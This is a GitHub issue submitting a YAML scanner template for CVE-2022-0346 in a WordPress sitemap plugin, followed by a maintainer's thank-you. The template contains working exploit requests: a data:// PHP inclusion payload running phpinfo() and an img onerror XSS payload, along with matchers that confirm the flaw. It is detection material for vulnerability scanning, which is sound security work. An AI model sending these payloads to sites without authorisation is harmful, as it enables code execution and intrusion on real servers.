CVE-2022-0346

Question

CVE-2022-0346

akincibor opened this issue 2 years ago · comments

id: CVE-2022-0346

info:
  name: Google XML Sitemap Generator < 2.0.4 - Reflected Cross-Site Scripting & RCE
  author: Akincibor
  severity: high
  description: The plugin does not validate a parameter which can be set to an arbitrary value, thus causing XSS via error message or RCE if allow_url_include is turned on.
  reference:
    - https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
  tags: xss,wp,wordpress,wp-plugin,cve,cve2022

requests:
  - method: GET
    path:
      - '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
      - '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(1)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src onerror=alert(1)>"
          - "PHP Extension"
          - "PHP Version"
        condition: or

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'

Prince Chaddha · Answer 1 · Fri May 20 2022 02:08:31 GMT+0800 (China Standard Time)

Hello @akincibor, thank you so much for sharing this template with the community and contributing to this project 🍻